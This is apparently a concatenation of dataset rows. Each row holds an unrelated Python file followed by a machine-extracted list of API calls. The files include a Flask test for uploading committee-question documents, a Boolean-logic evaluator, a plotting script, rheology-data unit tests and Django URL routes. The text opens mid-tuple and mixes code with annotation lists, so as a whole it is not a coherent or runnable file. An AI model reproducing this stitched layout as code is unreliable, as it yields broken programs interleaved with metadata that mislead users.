'([SensitiveProjectActionPermission])\n', (1775, 1811), False, 'from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency\n'), ((2466, 2523), 'dispatch.auth.permissions.PermissionsDependency', 'PermissionsDependency', (['[SensitiveProjectActionPermission]'], {}), '([SensitiveProjectActionPermission])\n', (2487, 2523), False, 'from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency\n')] |
import os
from urllib.parse import urlparse, parse_qs
from builtins import str
from tests import PMGLiveServerTestCase
from pmg.models import db, Committee, CommitteeQuestion
from tests.fixtures import dbfixture, UserData, CommitteeData, MembershipData
from flask import escape
from io import BytesIO
class TestAdminCommitteeQuestions(PMGLiveServerTestCase):
def setUp(self):
super().setUp()
self.fx = dbfixture.data(UserData)
self.fx.setup()
self.user = self.fx.UserData.admin
def tearDown(self):
self.delete_created_objects()
self.fx.teardown()
super().tearDown()
def test_upload_committee_question_document_with_old_format(self):
"""
Upload committee question document (/admin/committee-question/upload)
"""
url = "/admin/committee-question/upload"
data = {}
path = self.get_absolute_file_path(
"../data/committee_questions/RNW190-200303.docx"
)
with open(path, "rb") as f:
data["file"] = (f, "RNW190-200303.docx")
response = self.make_request(
url,
self.user,
data=data,
method="POST",
headers={"Referer": "/somethingelse"},
content_type="multipart/form-data",
)
self.assertEqual(302, response.status_code)
response_url = urlparse(response.location)
response_query = parse_qs(response_url.query)
self.assertIn("id", response_query, "Question ID must be in response query")
created_question_id = int(response_query["id"][0])
response = self.make_request(
"%s?%s" % (response_url.path, response_url.query),
self.user,
follow_redirects=True,
)
self.assertEqual(200, response.status_code)
# Test that the question that was created contains the correct data
question = CommitteeQuestion.query.get(created_question_id)
self.assertEqual(
question.question,
"Whether her Office has initiated the drafting of a Bill that seeks to protect and promote the rights of persons with disabilities; if not, (a) why not and (b) what steps does her Office intend taking in this regard; if so, on what date does she envisage that the Bill will be introduced in the National Assembly?",
)
self.assertEqual(
question.minister.name,
"Minister in The Presidency for Women, Youth and Persons with Disabilities",
)
self.assertEqual(question.asked_by_name, "<NAME>")
self.assertEqual(
question.answer,
"<p>Yes</p><p>(b) The Department is in the process of preparing the drafting of a Bill which will be submitted to Cabinet for approval before it will be tabled in Parliament during the 2021/2022 financial year.</p>",
)
self.assertEqual(question.code, "NW190")
# Delete the question that was created
self.created_objects.append(question)
def test_upload_committee_question_document_with_new_format(self):
"""
Upload committee question document (/admin/committee-question/upload)
"""
url = "/admin/committee-question/upload"
data = {}
path = self.get_absolute_file_path(
"../data/committee_questions/RNW104-2020-02-28.docx"
)
with open(path, "rb") as f:
data["file"] = (f, "RNW104-2020-02-28.docx")
response = self.make_request(
url,
self.user,
data=data,
method="POST",
headers={"Referer": "/admin/committee-question/"},
content_type="multipart/form-data",
)
self.assertEqual(302, response.status_code)
response_url = urlparse(response.location)
response_query = parse_qs(response_url.query)
self.assertIn("id", response_query, "Question ID must be in response query")
created_question_id = int(response_query["id"][0])
response = self.make_request(
"%s?%s" % (response_url.path, response_url.query),
self.user,
follow_redirects=True,
)
self.assertEqual(200, response.status_code)
# Test that the question that was created contains the correct data
question = CommitteeQuestion.query.get(created_question_id)
self.assertEqual(
question.question,
"What (a) is the number of (i) residential properties, (ii) business erven’, (iii) government buildings and (iv) agricultural properties owned by her department in the Lephalale Local Municipality which are (aa) vacant, (bb) occupied and (cc) earmarked for disposal and (b) total amount does her department owe the municipality in outstanding rates and services?",
)
self.assertEqual(
question.minister.name, "Minister of Public Works and Infrastructure",
)
self.assertEqual(question.asked_by_name, "<NAME>")
self.assertEqual(
question.answer,
"<p><strong>The Minister of Public Works and</strong><strong> Infrastructure: </strong></p><ol><li>The Department of Public Works and Infrastructure (DPWI) has informed me that in the Lephalale Local Municipality the Department owns (i) 183 residential properties (ii) one business erven (iii) 132 government buildings and (iv) 5 agricultural properties. DPWI informed me that (aa) 8 land parcels are vacant and (bb) only one property is unutilised. </li></ol><p>(cc) DPWI has not earmarked any properties for disposal in the Lephalale Local Municipality.</p><ol><li>In August 2019 the Department started a Government Debt Project engaging directly with municipalities and Eskom to verify and reconcile accounts and the project. DPWI, on behalf of client departments, owed the Lephalale Local Municipality, as per accounts received on 17 February 2020, R 334,989.69 which relates current consumption. </li></ol>",
)
self.assertEqual(question.code, "NW104")
# Delete the question that was created
self.created_objects.append(question)
def test_upload_committee_question_document_with_navigable_string_error(self):
"""
Upload committee question document (/admin/committee-question/upload)
"""
url = "/admin/committee-question/upload"
data = {}
path = self.get_absolute_file_path(
"../data/committee_questions/RNW1153-200619.docx"
)
with open(path, "rb") as f:
data["file"] = (f, "RNW1153-200619.docx")
response = self.make_request(
url,
self.user,
data=data,
method="POST",
headers={"Referer": "/admin/committee-question/"},
content_type="multipart/form-data",
)
self.assertEqual(302, response.status_code)
response_url = urlparse(response.location)
response_query = parse_qs(response_url.query)
self.assertIn("id", response_query, "Question ID must be in response query")
created_question_id = int(response_query["id"][0])
response = self.make_request(
"%s?%s" % (response_url.path, response_url.query),
self.user,
follow_redirects=True,
)
self.assertEqual(200, response.status_code)
# Test that the question that was created contains the correct data
question = CommitteeQuestion.query.get(created_question_id)
self.assertIn(
"(1)Whether, with reference to her reply to question 937 on 4 June 2020",
question.question,
)
self.assertEqual(
question.minister.name,
"Minister in The Presidency for Women, Youth and Persons with Disabilities",
)
self.assertEqual(question.asked_by_name, "<NAME>")
self.assertIn(
"There were no deviations from the standard supply chain management procedures",
question.answer,
)
self.assertEqual(question.code, "NW1153")
# Delete the question that was created
self.created_objects.append(question)
def get_absolute_file_path(self, relative_path):
dir_name = os.path.dirname(__file__)
return os.path.join(dir_name, relative_path)
| [
"urllib.parse.urlparse",
"pmg.models.CommitteeQuestion.query.get",
"os.path.join",
"tests.fixtures.dbfixture.data",
"urllib.parse.parse_qs",
"os.path.dirname"
]
| [((425, 449), 'tests.fixtures.dbfixture.data', 'dbfixture.data', (['UserData'], {}), '(UserData)\n', (439, 449), False, 'from tests.fixtures import dbfixture, UserData, CommitteeData, MembershipData\n'), ((1424, 1451), 'urllib.parse.urlparse', 'urlparse', (['response.location'], {}), '(response.location)\n', (1432, 1451), False, 'from urllib.parse import urlparse, parse_qs\n'), ((1477, 1505), 'urllib.parse.parse_qs', 'parse_qs', (['response_url.query'], {}), '(response_url.query)\n', (1485, 1505), False, 'from urllib.parse import urlparse, parse_qs\n'), ((1969, 2017), 'pmg.models.CommitteeQuestion.query.get', 'CommitteeQuestion.query.get', (['created_question_id'], {}), '(created_question_id)\n', (1996, 2017), False, 'from pmg.models import db, Committee, CommitteeQuestion\n'), ((3881, 3908), 'urllib.parse.urlparse', 'urlparse', (['response.location'], {}), '(response.location)\n', (3889, 3908), False, 'from urllib.parse import urlparse, parse_qs\n'), ((3934, 3962), 'urllib.parse.parse_qs', 'parse_qs', (['response_url.query'], {}), '(response_url.query)\n', (3942, 3962), False, 'from urllib.parse import urlparse, parse_qs\n'), ((4425, 4473), 'pmg.models.CommitteeQuestion.query.get', 'CommitteeQuestion.query.get', (['created_question_id'], {}), '(created_question_id)\n', (4452, 4473), False, 'from pmg.models import db, Committee, CommitteeQuestion\n'), ((7048, 7075), 'urllib.parse.urlparse', 'urlparse', (['response.location'], {}), '(response.location)\n', (7056, 7075), False, 'from urllib.parse import urlparse, parse_qs\n'), ((7101, 7129), 'urllib.parse.parse_qs', 'parse_qs', (['response_url.query'], {}), '(response_url.query)\n', (7109, 7129), False, 'from urllib.parse import urlparse, parse_qs\n'), ((7592, 7640), 'pmg.models.CommitteeQuestion.query.get', 'CommitteeQuestion.query.get', (['created_question_id'], {}), '(created_question_id)\n', (7619, 7640), False, 'from pmg.models import db, Committee, CommitteeQuestion\n'), ((8383, 8408), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (8398, 8408), False, 'import os\n'), ((8424, 8461), 'os.path.join', 'os.path.join', (['dir_name', 'relative_path'], {}), '(dir_name, relative_path)\n', (8436, 8461), False, 'import os\n')] |
from syloga.core.map_expression_args import map_expression_args
from syloga.utils.identity import identity
from syloga.ast.BooleanNot import BooleanNot
from syloga.ast.BooleanValue import BooleanValue
from syloga.ast.BooleanOr import BooleanOr
from syloga.ast.BooleanAnd import BooleanAnd
from syloga.ast.BooleanNand import BooleanNand
from syloga.ast.BooleanNor import BooleanNor
from syloga.ast.BooleanXor import BooleanXor
from syloga.ast.BreakOut import BreakOut
# from syloga.core.assert_equality_by_table import assert_equality_by_table
def evaluate_expr(expression):
recurse = evaluate_expr
# result = assert_equality_by_table
result = identity
#arg_is_value = lambda arg: isinstance(arg, (BooleanValue, bool))
arg_is_value = lambda arg: type(arg) in [BooleanValue, bool]
def arg_is_value(arg):
is_value = type(arg) in [BooleanValue, bool]
#print("is arg a value? " + str(type(arg)) + " " + str(arg))
#print("is_value", is_value)
return is_value
args_are_values = lambda args: all(map(arg_is_value, args))
get_value = lambda arg: arg if type(arg) == bool else arg.value
is_true = lambda val: val == True
is_false = lambda val: val == False
#print("looking at " + str(type(expression)))
if type(expression) == BooleanNot:
assert(len(expression.args) == 1)
        arg = recurse(expression.args[0])
if arg_is_value(arg):
return result(BooleanValue(not get_value(arg)))
else:
return result(BooleanNot(arg))
elif type(expression) == BooleanOr:
args = list(map(recurse, expression.args))
arg_values = [get_value(arg) for arg in args if arg_is_value(arg)]
args_wo_neutral = list(filter(lambda x: not(arg_is_value(x) and is_false(get_value(x))),args))
if args_are_values(args):
return result(BooleanValue(any(arg_values)))
elif any(map(is_true,arg_values)):
return result(BooleanValue(True))
elif len(args) == 1:
return result(recurse(args[0]))
elif len(args_wo_neutral) < len(args):
return result(recurse(BooleanOr(*args_wo_neutral)))
else:
return result(BooleanOr(*args))
elif type(expression) == BooleanAnd:
args = list(map(recurse, expression.args))
#print(expression.args)
#print(args)
#negated_atom_values = [not get_value(arg) for arg in args if arg_is_value(arg)]
arg_values = [get_value(arg) for arg in args if arg_is_value(arg)]
args_wo_neutral = list(filter(lambda x: not(arg_is_value(x) and is_true(get_value(x))),args))
#print(arg_values)
if args_are_values(args):
return result(BooleanValue(all(map(is_true,arg_values))))
elif any(map(is_false,arg_values)):
return result(BooleanValue(False))
elif len(args) == 1:
return result(recurse(args[0]))
elif len(args_wo_neutral) < len(args):
return result(recurse(BooleanAnd(*args_wo_neutral)))
else:
return result(BooleanAnd(*args))
elif type(expression) == BooleanNand:
return result(recurse(BooleanNot(BooleanAnd(*expression.args))))
elif type(expression) == BooleanNor:
return result(recurse(BooleanNot(BooleanOr(*expression.args))))
elif type(expression) == BooleanXor:
args = list(map(recurse, expression.args))
arg_values = [get_value(arg) for arg in args if arg_is_value(arg)]
non_value_args = [arg for arg in args if not arg_is_value(arg)]
if len(args) == 0:
raise ValueError("args are missing")
elif len(args) == 1:
return result(args[0])
elif len(arg_values) == 0:
return result(BooleanXor(*non_value_args))
elif len(arg_values) == 1:
if is_true(arg_values[0]):
return result(BooleanXor(arg_values[0], *non_value_args))
else:
return result(recurse(BooleanXor(*non_value_args)))
elif len(arg_values) > 1:
evaluated = is_true(arg_values[0])
for a in arg_values[1:]:
evaluated ^= is_true(a)
evaluated = bool(evaluated)
return result(recurse(BooleanXor(evaluated, *non_value_args)))
elif type(expression) == BreakOut:
expr = recurse(expression.expr)
if arg_is_value(expr):
return result(BooleanValue(expr))
else:
return result(BreakOut(expr))
else:
return result(map_expression_args(recurse, expression, recurse_collection=True))
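# Illustrative usage sketch (assumes the constructors imported above are used
# exactly as in evaluate_expr; "x" stands for some non-value sub-expression):
#   evaluate_expr(BooleanAnd(BooleanValue(True), BooleanNot(BooleanValue(True))))
#       -> BooleanValue(False)
#   evaluate_expr(BooleanOr(BooleanValue(False), x))
#       -> x evaluated on its own, since False is the neutral element of Or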
| [
"syloga.ast.BooleanNot.BooleanNot",
"syloga.ast.BooleanXor.BooleanXor",
"syloga.ast.BooleanOr.BooleanOr",
"syloga.ast.BooleanAnd.BooleanAnd",
"syloga.core.map_expression_args.map_expression_args",
"syloga.ast.BooleanValue.BooleanValue",
"syloga.ast.BreakOut.BreakOut"
]
| [((1555, 1570), 'syloga.ast.BooleanNot.BooleanNot', 'BooleanNot', (['arg'], {}), '(arg)\n', (1565, 1570), False, 'from syloga.ast.BooleanNot import BooleanNot\n'), ((2036, 2054), 'syloga.ast.BooleanValue.BooleanValue', 'BooleanValue', (['(True)'], {}), '(True)\n', (2048, 2054), False, 'from syloga.ast.BooleanValue import BooleanValue\n'), ((2960, 2979), 'syloga.ast.BooleanValue.BooleanValue', 'BooleanValue', (['(False)'], {}), '(False)\n', (2972, 2979), False, 'from syloga.ast.BooleanValue import BooleanValue\n'), ((2307, 2323), 'syloga.ast.BooleanOr.BooleanOr', 'BooleanOr', (['*args'], {}), '(*args)\n', (2316, 2323), False, 'from syloga.ast.BooleanOr import BooleanOr\n'), ((3332, 3360), 'syloga.ast.BooleanAnd.BooleanAnd', 'BooleanAnd', (['*expression.args'], {}), '(*expression.args)\n', (3342, 3360), False, 'from syloga.ast.BooleanAnd import BooleanAnd\n'), ((2228, 2255), 'syloga.ast.BooleanOr.BooleanOr', 'BooleanOr', (['*args_wo_neutral'], {}), '(*args_wo_neutral)\n', (2237, 2255), False, 'from syloga.ast.BooleanOr import BooleanOr\n'), ((3225, 3242), 'syloga.ast.BooleanAnd.BooleanAnd', 'BooleanAnd', (['*args'], {}), '(*args)\n', (3235, 3242), False, 'from syloga.ast.BooleanAnd import BooleanAnd\n'), ((3451, 3478), 'syloga.ast.BooleanOr.BooleanOr', 'BooleanOr', (['*expression.args'], {}), '(*expression.args)\n', (3460, 3478), False, 'from syloga.ast.BooleanOr import BooleanOr\n'), ((4798, 4863), 'syloga.core.map_expression_args.map_expression_args', 'map_expression_args', (['recurse', 'expression'], {'recurse_collection': '(True)'}), '(recurse, expression, recurse_collection=True)\n', (4817, 4863), False, 'from syloga.core.map_expression_args import map_expression_args\n'), ((3153, 3181), 'syloga.ast.BooleanAnd.BooleanAnd', 'BooleanAnd', (['*args_wo_neutral'], {}), '(*args_wo_neutral)\n', (3163, 3181), False, 'from syloga.ast.BooleanAnd import BooleanAnd\n'), ((4684, 4702), 'syloga.ast.BooleanValue.BooleanValue', 'BooleanValue', (['expr'], {}), '(expr)\n', (4696, 4702), False, 'from syloga.ast.BooleanValue import BooleanValue\n'), ((4744, 4758), 'syloga.ast.BreakOut.BreakOut', 'BreakOut', (['expr'], {}), '(expr)\n', (4752, 4758), False, 'from syloga.ast.BreakOut import BreakOut\n'), ((3967, 3994), 'syloga.ast.BooleanXor.BooleanXor', 'BooleanXor', (['*non_value_args'], {}), '(*non_value_args)\n', (3977, 3994), False, 'from syloga.ast.BooleanXor import BooleanXor\n'), ((4109, 4151), 'syloga.ast.BooleanXor.BooleanXor', 'BooleanXor', (['arg_values[0]', '*non_value_args'], {}), '(arg_values[0], *non_value_args)\n', (4119, 4151), False, 'from syloga.ast.BooleanXor import BooleanXor\n'), ((4209, 4236), 'syloga.ast.BooleanXor.BooleanXor', 'BooleanXor', (['*non_value_args'], {}), '(*non_value_args)\n', (4219, 4236), False, 'from syloga.ast.BooleanXor import BooleanXor\n'), ((4497, 4535), 'syloga.ast.BooleanXor.BooleanXor', 'BooleanXor', (['evaluated', '*non_value_args'], {}), '(evaluated, *non_value_args)\n', (4507, 4535), False, 'from syloga.ast.BooleanXor import BooleanXor\n')] |
from parameters import *
from library_time import *
from paths import *
import numpy as np
import pylab as plt
import matplotlib.pyplot as mplt
mplt.rc('text', usetex=True)
mplt.rcParams.update({'font.size': 16})
import logging, getopt, sys
import time
import os
##########################################################################################
# C O N F I G U R A T I O N
##########################################################################################
# activate ylim for w
var1 = w1
var3 = w3
var5 = w5
var10 = w10
var25 = w25
mode = "w" # u or w
##########################################################################################
# M A I N
##########################################################################################
if __name__ == "__main__":
if not os.path.exists('plots'):
os.makedirs('plots')
print('Created folder plots!')
if not os.path.exists('plots/integral'):
os.makedirs('plots/integral')
print('Created folder plots/integral!')
t = np.linspace(tmin, tmax, Nt)
r = np.linspace(0,R,Nr)
Ivar1 = np.zeros(Nt)
Ivar3 = np.zeros(Nt)
Ivar5 = np.zeros(Nt)
Ivar10 = np.zeros(Nt)
Ivar25 = np.zeros(Nt)
for i in range(Nt):
# /1000000 because of units
Ivar1[i] = integrate(var1, i,r, Nt)/1000000
Ivar3[i] = integrate(var3, i,r, Nt)/1000000
Ivar5[i] = integrate(var5, i,r, Nt)/1000000
Ivar10[i] = integrate(var10, i,r, Nt)/1000000
Ivar25[i] = integrate(var25, i,r, Nt)/1000000
mplt.plot(t, Ivar1, label=r'$\alpha = 1$')
mplt.plot(t, Ivar3, label=r'$\alpha = 3$')
mplt.plot(t, Ivar5, label=r'$\alpha = 5$')
mplt.plot(t, Ivar10, label=r'$\alpha = 10$')
mplt.plot(t, Ivar25, label=r'$\alpha = 25$')
mplt.xlim(tmin, tmax)
mplt.yscale('log')
mplt.xlabel(r'$t\quad [h]$')
    mplt.ylabel(r'$\bar{' + mode + r'}\quad [\mu mol]$')
##########################################################################################
    # lim for w, because some values don't make sense
    mplt.ylim(1e-11, 3e2)
    # lim for w, because some values don't make sense
##########################################################################################
mplt.legend(loc=1, bbox_to_anchor=(1, 0.9))
mplt.tight_layout()
mplt.savefig('plots/integral/int'+mode+'.pdf', format='pdf')
mplt.show() | [
"os.path.exists",
"matplotlib.pyplot.savefig",
"os.makedirs",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.rcParams.update",
"numpy.linspace",
"numpy.zeros",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.xlim",
"matplotlib.pyplot.yscale",
"matplotlib.pyplot.rc",
"matplotlib.pyplot.show"
]
| [((145, 173), 'matplotlib.pyplot.rc', 'mplt.rc', (['"""text"""'], {'usetex': '(True)'}), "('text', usetex=True)\n", (152, 173), True, 'import matplotlib.pyplot as mplt\n'), ((174, 213), 'matplotlib.pyplot.rcParams.update', 'mplt.rcParams.update', (["{'font.size': 16}"], {}), "({'font.size': 16})\n", (194, 213), True, 'import matplotlib.pyplot as mplt\n'), ((1057, 1084), 'numpy.linspace', 'np.linspace', (['tmin', 'tmax', 'Nt'], {}), '(tmin, tmax, Nt)\n', (1068, 1084), True, 'import numpy as np\n'), ((1093, 1114), 'numpy.linspace', 'np.linspace', (['(0)', 'R', 'Nr'], {}), '(0, R, Nr)\n', (1104, 1114), True, 'import numpy as np\n'), ((1131, 1143), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1139, 1143), True, 'import numpy as np\n'), ((1157, 1169), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1165, 1169), True, 'import numpy as np\n'), ((1183, 1195), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1191, 1195), True, 'import numpy as np\n'), ((1209, 1221), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1217, 1221), True, 'import numpy as np\n'), ((1235, 1247), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1243, 1247), True, 'import numpy as np\n'), ((1585, 1627), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar1'], {'label': '"""$\\\\alpha = 1$"""'}), "(t, Ivar1, label='$\\\\alpha = 1$')\n", (1594, 1627), True, 'import matplotlib.pyplot as mplt\n'), ((1632, 1674), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar3'], {'label': '"""$\\\\alpha = 3$"""'}), "(t, Ivar3, label='$\\\\alpha = 3$')\n", (1641, 1674), True, 'import matplotlib.pyplot as mplt\n'), ((1679, 1721), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar5'], {'label': '"""$\\\\alpha = 5$"""'}), "(t, Ivar5, label='$\\\\alpha = 5$')\n", (1688, 1721), True, 'import matplotlib.pyplot as mplt\n'), ((1726, 1770), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar10'], {'label': '"""$\\\\alpha = 10$"""'}), "(t, Ivar10, label='$\\\\alpha = 10$')\n", (1735, 1770), True, 'import matplotlib.pyplot as mplt\n'), ((1775, 1819), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar25'], {'label': '"""$\\\\alpha = 25$"""'}), "(t, Ivar25, label='$\\\\alpha = 25$')\n", (1784, 1819), True, 'import matplotlib.pyplot as mplt\n'), ((1824, 1845), 'matplotlib.pyplot.xlim', 'mplt.xlim', (['tmin', 'tmax'], {}), '(tmin, tmax)\n', (1833, 1845), True, 'import matplotlib.pyplot as mplt\n'), ((1850, 1868), 'matplotlib.pyplot.yscale', 'mplt.yscale', (['"""log"""'], {}), "('log')\n", (1861, 1868), True, 'import matplotlib.pyplot as mplt\n'), ((1873, 1901), 'matplotlib.pyplot.xlabel', 'mplt.xlabel', (['"""$t\\\\quad [h]$"""'], {}), "('$t\\\\quad [h]$')\n", (1884, 1901), True, 'import matplotlib.pyplot as mplt\n'), ((1906, 1959), 'matplotlib.pyplot.ylabel', 'mplt.ylabel', (["('$\\\\bar{' + mode + '}\\\\quad [\\\\mu mol]$')"], {}), "('$\\\\bar{' + mode + '}\\\\quad [\\\\mu mol]$')\n", (1917, 1959), True, 'import matplotlib.pyplot as mplt\n'), ((2102, 2125), 'matplotlib.pyplot.ylim', 'mplt.ylim', (['(1e-11)', '(300.0)'], {}), '(1e-11, 300.0)\n', (2111, 2125), True, 'import matplotlib.pyplot as mplt\n'), ((2273, 2316), 'matplotlib.pyplot.legend', 'mplt.legend', ([], {'loc': '(1)', 'bbox_to_anchor': '(1, 0.9)'}), '(loc=1, bbox_to_anchor=(1, 0.9))\n', (2284, 2316), True, 'import matplotlib.pyplot as mplt\n'), ((2321, 2340), 'matplotlib.pyplot.tight_layout', 'mplt.tight_layout', ([], {}), '()\n', (2338, 2340), True, 'import matplotlib.pyplot as mplt\n'), ((2345, 2409), 'matplotlib.pyplot.savefig', 'mplt.savefig', 
(["('plots/integral/int' + mode + '.pdf')"], {'format': '"""pdf"""'}), "('plots/integral/int' + mode + '.pdf', format='pdf')\n", (2357, 2409), True, 'import matplotlib.pyplot as mplt\n'), ((2410, 2421), 'matplotlib.pyplot.show', 'mplt.show', ([], {}), '()\n', (2419, 2421), True, 'import matplotlib.pyplot as mplt\n'), ((820, 843), 'os.path.exists', 'os.path.exists', (['"""plots"""'], {}), "('plots')\n", (834, 843), False, 'import os\n'), ((853, 873), 'os.makedirs', 'os.makedirs', (['"""plots"""'], {}), "('plots')\n", (864, 873), False, 'import os\n'), ((924, 956), 'os.path.exists', 'os.path.exists', (['"""plots/integral"""'], {}), "('plots/integral')\n", (938, 956), False, 'import os\n'), ((966, 995), 'os.makedirs', 'os.makedirs', (['"""plots/integral"""'], {}), "('plots/integral')\n", (977, 995), False, 'import os\n')] |
import sys, os
sys.path.append("C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors")
import h5py
import pandas as pd
from antonpaar import AntonPaarExtractor as APE
from ARES_G2 import ARES_G2Extractor
# %%
sys.path.append("C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata")
from data_converter import rheo_data_transformer
import unittest
extractor = APE()
#converter = data_converter()
class TestAntonPaar(unittest.TestCase):
def setUp(self):
self.multi_file_test = "C:/Users/Delgado/Documents/Research/rheology-data-toolkit/tests/test_data/Anton_Paar/excel_test_data/two_tests_Steady State Viscosity Curve-LO50C_excel.xlsx"
self.modified_dict, self.raw_data_dict, self.cols, self.units = extractor.import_rheo_data(self.multi_file_test)
# Inilize the class to convert
self.converter = rheo_data_transformer(self.modified_dict, self.raw_data_dict, self.cols, self.units)
self.converter.load_to_hdf("test")
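        # load_to_hdf("test") is expected to write "test.hdf5", which the
        # HDF5 assertions below open with h5py (the exact output name is an
        # assumption based on those tests, not on the converter's docs).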
def test_modified_output_isdictionary(self):
self.assertIsInstance(self.modified_dict, dict)
def test_modified_output_dictionary_contains_pandas(self):
""" Test if the output is a dictonary of pandas dataframes'"""
for value in self.modified_dict.values():
self.assertIsInstance(value, pd.DataFrame)
def test_raw_output_isdictionary(self):
self.assertIsInstance(self.raw_data_dict, dict)
def test_raw_output_dictionary_contains_pandas(self):
""" Test if the output is a dictonary of pandas dataframes'"""
for value in self.raw_data_dict.values():
self.assertIsInstance(value, pd.DataFrame)
def test_project_name_added_raw_data(self):
""" Test if the output is a dictonary of pandas dataframes'"""
for df in self.raw_data_dict.values():
self.assertEqual(df.iloc[0,0], "Project:")
def test_hdf5_created(self):
name, ext = os.path.splitext("test.hdf5")
self.assertEqual(ext, ".hdf5")
def test_project_subfolders_added(self):
f = h5py.File('test.hdf5', "r")
project_keys = list(f['Project'].keys())
f.close()
self.assertListEqual(project_keys, ['Steady State Viscosity Curve-75C','Steady State Viscosity Curve-LO80C', ])
def test_analyze_cols(self):
temp_df = extractor.make_analyze_dataframes(self.multi_file_test)
for test_key in temp_df.keys():
test_cols = list(temp_df[test_key].columns)
parsed_cols = list(self.cols[test_key])
self.assertListEqual(test_cols, parsed_cols)
# TODO Write test for saving a file
if __name__ == '__main__':
unittest.main()
| [
"antonpaar.AntonPaarExtractor",
"os.path.splitext",
"h5py.File",
"data_converter.rheo_data_transformer",
"unittest.main",
"sys.path.append"
]
| [((15, 121), 'sys.path.append', 'sys.path.append', (['"""C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors"""'], {}), "(\n 'C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors'\n )\n", (30, 121), False, 'import sys, os\n'), ((236, 326), 'sys.path.append', 'sys.path.append', (['"""C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata"""'], {}), "(\n 'C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata')\n", (251, 326), False, 'import sys, os\n'), ((401, 406), 'antonpaar.AntonPaarExtractor', 'APE', ([], {}), '()\n', (404, 406), True, 'from antonpaar import AntonPaarExtractor as APE\n'), ((2711, 2726), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2724, 2726), False, 'import unittest\n'), ((877, 965), 'data_converter.rheo_data_transformer', 'rheo_data_transformer', (['self.modified_dict', 'self.raw_data_dict', 'self.cols', 'self.units'], {}), '(self.modified_dict, self.raw_data_dict, self.cols,\n self.units)\n', (898, 965), False, 'from data_converter import rheo_data_transformer\n'), ((1969, 1998), 'os.path.splitext', 'os.path.splitext', (['"""test.hdf5"""'], {}), "('test.hdf5')\n", (1985, 1998), False, 'import sys, os\n'), ((2100, 2127), 'h5py.File', 'h5py.File', (['"""test.hdf5"""', '"""r"""'], {}), "('test.hdf5', 'r')\n", (2109, 2127), False, 'import h5py\n')] |
from django.conf.urls.defaults import url, include, patterns
from corehq.apps.appstore.dispatcher import AppstoreDispatcher
store_urls = patterns('corehq.apps.appstore.views',
url(r'^$', 'appstore_default', name="appstore_interfaces_default"),
AppstoreDispatcher.url_pattern(),
)
urlpatterns = patterns('corehq.apps.appstore.views',
url(r'^$', 'appstore', name='appstore'),
url(r'^api/', 'appstore_api', name='appstore_api'),
url(r'^store/', include(store_urls)),
url(r'^(?P<domain>[\w\.-]+)/info/$', 'project_info', name='project_info'),
url(r'^deployments/$', 'deployments', name='deployments'),
url(r'^deployments/api/$', 'deployments_api', name='deployments_api'),
url(r'^deployments/(?P<domain>[\w\.-]+)/info/$', 'deployment_info', name='deployment_info'),
url(r'^(?P<domain>[\w\.-]+)/approve/$', 'approve_app', name='approve_appstore_app'),
url(r'^(?P<domain>[\w\.-]+)/copy/$', 'copy_snapshot', name='domain_copy_snapshot'),
url(r'^(?P<domain>[\w\.-]+)/importapp/$', 'import_app', name='import_app_from_snapshot'),
url(r'^(?P<domain>[\w\.-]+)/image/$', 'project_image', name='appstore_project_image'),
url(r'^(?P<domain>[\w\.-]+)/multimedia/$', 'media_files', name='media_files'),
)
| [
"django.conf.urls.defaults.include",
"django.conf.urls.defaults.url",
"corehq.apps.appstore.dispatcher.AppstoreDispatcher.url_pattern"
]
| [((181, 246), 'django.conf.urls.defaults.url', 'url', (['"""^$"""', '"""appstore_default"""'], {'name': '"""appstore_interfaces_default"""'}), "('^$', 'appstore_default', name='appstore_interfaces_default')\n", (184, 246), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((253, 285), 'corehq.apps.appstore.dispatcher.AppstoreDispatcher.url_pattern', 'AppstoreDispatcher.url_pattern', ([], {}), '()\n', (283, 285), False, 'from corehq.apps.appstore.dispatcher import AppstoreDispatcher\n'), ((347, 385), 'django.conf.urls.defaults.url', 'url', (['"""^$"""', '"""appstore"""'], {'name': '"""appstore"""'}), "('^$', 'appstore', name='appstore')\n", (350, 385), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((392, 441), 'django.conf.urls.defaults.url', 'url', (['"""^api/"""', '"""appstore_api"""'], {'name': '"""appstore_api"""'}), "('^api/', 'appstore_api', name='appstore_api')\n", (395, 441), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((491, 565), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/info/$"""', '"""project_info"""'], {'name': '"""project_info"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/info/$', 'project_info', name='project_info')\n", (494, 565), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((571, 627), 'django.conf.urls.defaults.url', 'url', (['"""^deployments/$"""', '"""deployments"""'], {'name': '"""deployments"""'}), "('^deployments/$', 'deployments', name='deployments')\n", (574, 627), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((634, 702), 'django.conf.urls.defaults.url', 'url', (['"""^deployments/api/$"""', '"""deployments_api"""'], {'name': 